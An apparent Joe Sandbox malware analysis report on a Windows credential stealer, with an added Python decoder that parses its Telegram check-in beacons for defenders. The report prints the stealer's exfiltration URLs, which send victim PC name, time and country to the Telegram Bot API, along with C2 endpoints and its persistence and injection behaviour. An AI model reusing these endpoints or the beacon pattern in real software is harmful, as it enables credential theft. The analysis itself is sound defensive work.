Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
Resource Development: 111 Scripting, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
Execution: 2 Command and Scripting Interpreter, 1 Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers
Persistence: 111 Scripting, 1 DLL Side-Loading, 1 Scheduled Task/Job, 2 Registry Run Keys / Startup Folder, Network Logon Script, RC Scripts, Startup Items
Privilege Escalation: 1 DLL Side-Loading, 11 Process Injection, 1 Scheduled Task/Job, 2 Registry Run Keys / Startup Folder, Network Logon Script, RC Scripts, Startup Items
Defense Evasion: 1 Disable or Modify Tools, 3 Obfuscated Files or Information, 12 Software Packing, 1 DLL Side-Loading, 1 Masquerading, 31 Virtualization/Sandbox Evasion, 11 Process Injection
Credential Access: 1 OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
Discovery: 2 File and Directory Discovery, 13 System Information Discovery, 21 Security Software Discovery, 1 Process Discovery, 31 Virtualization/Sandbox Evasion, 1 Application Window Discovery, 1 System Network Configuration Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
Collection: 1 Archive Collected Data, 1 Data from Local System, 1 Email Collection, 1 Clipboard Data, Keylogging, GUI Input Capture, Web Portal Capture
Command and Control: 1 Web Service, 3 Ingress Tool Transfer, 11 Encrypted Channel, 3 Non-Application Layer Protocol, 24 Application Layer Protocol, Multiband Communication, Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery
Behavior Graph ID: 1634876 | Sample: pbgjw8i8N7.exe | Start date: 11/03/2025 | Architecture: WINDOWS | Score: 100

Process tree from the behavior graph (bracketed numbers are the graph's per-process counters for created files and registry values; 2 other IPs or domains, 3 other IPs or domains and 12 other signatures are collapsed in the graph and not listed):

Start
  DNS/IP: reallyfreegeoip.org; api.telegram.org; 3 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
    reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
    api.telegram.org: Uses the Telegram API (likely for C&C communication)
  Started: pbgjw8i8N7.exe; wscript.exe

pbgjw8i8N7.exe [5]
  Dropped: C:\Users\user\AppData\Roaming\XsdType.exe (PE32); C:\Users\user\...\XsdType.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Roaming\...\XsdType.vbs (ASCII)
  Signatures: Drops VBS files to the startup folder; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  Started: InstallUtil.exe [15, 2]
    DNS/IP: api.telegram.org 149.154.167.220, 443, 49745, 49753 TELEGRAMRU United Kingdom; checkip.dyndns.com 158.101.44.242, 49712, 49715, 49716 ORACLE-BMC-31898US United States; 2 other IPs or domains
    Signatures: Tries to steal Mail credentials (via file / registry access)

wscript.exe [1]
  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  Started: XsdType.exe [2]
    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file
    Started: InstallUtil.exe [2]
      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Initial sample (Source | Detection | Scanner | Label)
pbgjw8i8N7.exe | 70% | Virustotal | -
pbgjw8i8N7.exe | 63% | ReversingLabs | ByteCode-MSIL.Infostealer.Browsstl
pbgjw8i8N7.exe | 100% | Avira | TR/AD.GenSteal.frzkf

Dropped files (Source | Detection | Scanner | Label)
C:\Users\user\AppData\Roaming\XsdType.exe | 100% | Avira | TR/AD.GenSteal.frzkf
C:\Users\user\AppData\Roaming\XsdType.exe | 70% | Virustotal | -
C:\Users\user\AppData\Roaming\XsdType.exe | 63% | ReversingLabs | ByteCode-MSIL.Infostealer.Browsstl

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches
URLs: No Antivirus matches
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
mail.iaa-airferight.com | 46.175.148.58 | true | false | - | high
reallyfreegeoip.org | 104.21.96.1 | true | false | - | high
api.telegram.org | 149.154.167.220 | true | false | - | high
checkip.dyndns.com | 158.101.44.242 | true | false | - | high
checkip.dyndns.org | unknown | unknown | false | - | high
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
https://reallyfreegeoip.org/xml/8.46.123.189 | false | - | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2012/03/2025%20/%2023:06:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | - | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2012/03/2025%20/%2005:49:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | - | high
http://checkip.dyndns.org/ | false | - | high
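The two api.telegram.org URLs above are the stealer's check-in beacon: a Bot API sendMessage call whose percent-encoded text carries the victim's PC name, the local date and time, and the country looked up via reallyfreegeoip.org. The bot token (between "bot" and "/sendMessage") and chat_id are blank in the report. The following decoder is an added example, not part of the Joe Sandbox report; it takes the two URLs exactly as listed and splits them into fields. The output key names (pc_name, timestamp, country, note) are my own.

```python
"""Decoder for the Telegram Bot API beacons listed in the URL table. Added
example, not part of the Joe Sandbox report; the URLs are copied from it (bot
token and chat_id are blank there), the output field names are my own."""
from urllib.parse import parse_qs, urlsplit

# Copied from the report's URL table; same beacon sent at two different times.
BEACONS = [
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2012/03/2025%20/%2023:06:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2012/03/2025%20/%2005:49:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D",
]

# Labels the beacon text uses, mapped to the keys this decoder emits.
LABELS = {"pc name": "pc_name", "date and time": "timestamp", "country name": "country"}


def parse_beacon(url):
    """Split a Bot API URL into token, method, chat_id and the decoded text fields."""
    parts = urlsplit(url)
    if parts.hostname != "api.telegram.org":
        raise ValueError("not a Telegram Bot API URL")
    # Path is /bot<token>/<method>; the token identifies the operator's bot and
    # is the value to report to Telegram and to block on, when it is present.
    segs = parts.path.strip("/").split("/")
    if len(segs) != 2 or not segs[0].startswith("bot"):
        raise ValueError("unexpected Bot API path: " + parts.path)
    query = parse_qs(parts.query, keep_blank_values=True)
    out = {
        "token": segs[0][len("bot"):],      # "" here because the report blanks it
        "method": segs[1],
        "chat_id": query.get("chat_id", [""])[0],
        "note": "",
    }
    text = query.get("text", [""])[0]       # parse_qs already percent-decodes
    for line in text.split("\r\n"):         # %0D%0A separates the fields
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            out["note"] = line[1:-1].strip()  # the trailing bracketed status line
            continue
        label, sep, value = line.partition(":")
        key = LABELS.get(label.strip().lower())
        if sep and key:
            out[key] = value.strip()
    return out


def decode_all(urls=BEACONS):
    """Decode every beacon in order; returns one dict per URL."""
    return [parse_beacon(u) for u in urls]


if __name__ == "__main__":
    for beacon in decode_all():
        print(beacon)
```

The same split works on proxy or TLS-inspection logs for any Telegram-based stealer: the path carries the token, the query carries chat_id and the exfiltrated text, so a decoder keyed on "api.telegram.org" plus a "/bot" path prefix recovers the operator identifiers without needing the sample.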
URLs from memory (Name | Source | Malicious | Antivirus Detection | Reputation)
https://www.office.com/ | InstallUtil.exe, 00000004.00000002.2569306283.0000000002551000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024CB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://stackoverflow.com/q/14436606/23354 | pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1331701274.0000000002971000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1463433201.0000000002A11000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org | InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/mgravell/protobuf-netJ | pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot | pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://mail.iaa-airferight.com | InstallUtil.exe, 00000001.00000002.2570925272.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.office.com/lB | InstallUtil.exe, 00000001.00000002.2570925272.0000000002CB0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000254C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/mgravell/protobuf-net | pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org?q= | InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://checkip.dyndns.org | InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002590000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmp | false
                                                                high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=InstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://chrome.google.com/webstore?hl=en4InstallUtil.exe, 00000001.00000002.2570925272.0000000002C84000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002520000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://chrome.google.com/webstore?hl=enInstallUtil.exe, 00000004.00000002.2569306283.0000000002511000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://varders.kozow.com:8081pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20aInstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://aborters.duckdns.org:8081pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.google.com/images/branding/product/ico/googleg_alldp.icoInstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.ecosia.org/newtab/v20InstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://github.com/mgravell/protobuf-netipbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.office.com/4InstallUtil.exe, 00000001.00000002.2570925272.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002551000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://51.38.247.67:8081/_send_.php?LInstallUtil.exe, 00000001.00000002.2570925272.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://anotherarmy.dns.army:8081pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://stackoverflow.com/q/11564914/23354;pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://stackoverflow.com/q/2152978/23354pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchInstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://checkip.dyndns.org/qpbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://chrome.google.com/webstore?hl=enlBInstallUtil.exe, 00000001.00000002.2570925272.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000251B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://reallyfreegeoip.org/xml/8.46.123.189$InstallUtil.exe, 00000001.00000002.2570925272.0000000002BE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002590000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000243A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000247F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://reallyfreegeoip.orgInstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://duckduckgo.com/chrome_newtabv209hInstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://api.telegramInstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://reallyfreegeoip.orgInstallUtil.exe, 00000001.00000002.2570925272.0000000002BE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B73000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000247F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002410000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://checkip.dyndns.comInstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://api.telegram.orgInstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepbgjw8i8N7.exe, 00000000.00000002.1331701274.0000000002971000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1463433201.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://gemini.google.com/app?q=InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedpbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://reallyfreegeoip.org/xml/pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B73000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002410000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
IP               Domain                   Country         ASN    ASN Name            Malicious
149.154.167.220  api.telegram.org         United Kingdom  62041  TELEGRAMRU          false
46.175.148.58    mail.iaa-airferight.com  Ukraine         56394  ASLAGIDKOM-NETUA    false
104.21.96.1      reallyfreegeoip.org      United States   13335  CLOUDFLARENETUS     false
158.101.44.242   checkip.dyndns.com       United States   31898  ORACLE-BMC-31898US  false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1634876
Start date and time: 2025-03-11 06:09:02 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: pbgjw8i8N7.exe
renamed because original name is a hash value
Original Sample Name: 44095f79a9e682a29ed75fab33f6dcf1e2f11937097e4c7e3f84080ff7444048.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@8/3@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 443
• Number of non-executed functions: 47
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 23.199.214.10, 52.149.20.212, 150.171.27.10
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, g.bing.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time      Type             Description
01:10:03  API Interceptor  2376135x Sleep call for process: InstallUtil.exe modified
